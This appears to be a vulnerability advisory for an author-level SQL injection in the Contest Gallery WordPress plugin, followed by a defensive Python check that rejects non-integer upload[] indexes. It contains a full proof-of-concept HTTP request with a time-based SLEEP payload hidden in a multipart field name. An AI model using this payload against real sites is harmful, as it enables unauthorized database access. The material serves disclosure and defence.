Source: wpexploit | Author: Daniel Krohmer | WPEX-ID:35B0126D-9293-4E64-A00F-0903303F960A
History: Dec 05, 2022 - 12:00 a.m.

Contest Gallery < 19.1.5.1 - Author+ SQL Injection

Published: 2022-12-05 00:00:00
Author: Daniel Krohmer
Tags: sql injection, contest gallery, author+, security issue, form data, xmlhttprequest, wordpress, localhost

EPSS: 0.001
Percentile: 36.8%

The plugin does not escape the upload[] POST parameter before concatenating it into an SQL query in get-data-create-upload-v10.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&option_id=1&define_upload=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2697798261719864473183552564
Content-Length: 1215
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668359977
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="_wpnonce"

07bde4fc61
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/admin-ajax.php?page=contest-gallery%2Findex.php&option_id=1&define_upload=true
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="option_id"

1
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="upload[1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)][type]"

url
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="upload[1][order]"

4
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="actualID[]"

1
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="action"

post_contest_gallery_action_ajax
-----------------------------2697798261719864473183552564
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------2697798261719864473183552564--
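In the request above the payload travels in the array index of the upload[] field name, not in a field value, so a validation or WAF rule has to look at the multipart part names. The following Python check is an added example, not code from the advisory or from the plugin: it parses a constructed multipart body with the same shape and rejects any upload[] index that is not a plain integer. Casting the index to an integer (or passing it through $wpdb->prepare) is the assumed shape of a server-side fix, not the vendor's actual patch.

```python
import re
from typing import List, Tuple

# Constructed sample body modelled on the advisory's request (not the page's bytes).
# One upload[] index is a plain id; the other carries a time-based SQL payload in the key.
BOUNDARY = "---------------------------exampleboundary"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="option_id"\r\n\r\n1\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload[1][order]"\r\n\r\n4\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; '
    'name="upload[1/**/AND/**/(SELECT(SLEEP(5)))x][type]"\r\n\r\nurl\r\n'
    f"--{BOUNDARY}--\r\n"
)

NAME_RE = re.compile(r'Content-Disposition: form-data; name="([^"]*)"')
UPLOAD_INDEX_RE = re.compile(r"^upload\[([^\]]*)\]")


def multipart_field_names(body: str, boundary: str) -> List[str]:
    """Return the field name of every part in a multipart/form-data body."""
    names = []
    for part in body.split(f"--{boundary}"):
        match = NAME_RE.search(part)
        if match:
            names.append(match.group(1))
    return names


def check_upload_indexes(field_names: List[str]) -> Tuple[List[int], List[str]]:
    """Split upload[<index>] keys into accepted integer ids and rejected raw keys.

    Only digit strings are accepted (the equivalent of absint() in a PHP handler,
    assumed here); anything else is what a server-side check should log and refuse.
    """
    accepted, rejected = [], []
    for name in field_names:
        match = UPLOAD_INDEX_RE.match(name)
        if not match:
            continue  # not an upload[] field (e.g. option_id, action)
        index = match.group(1)
        if index.isdigit():
            accepted.append(int(index))
        else:
            rejected.append(index)
    return sorted(set(accepted)), rejected
```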
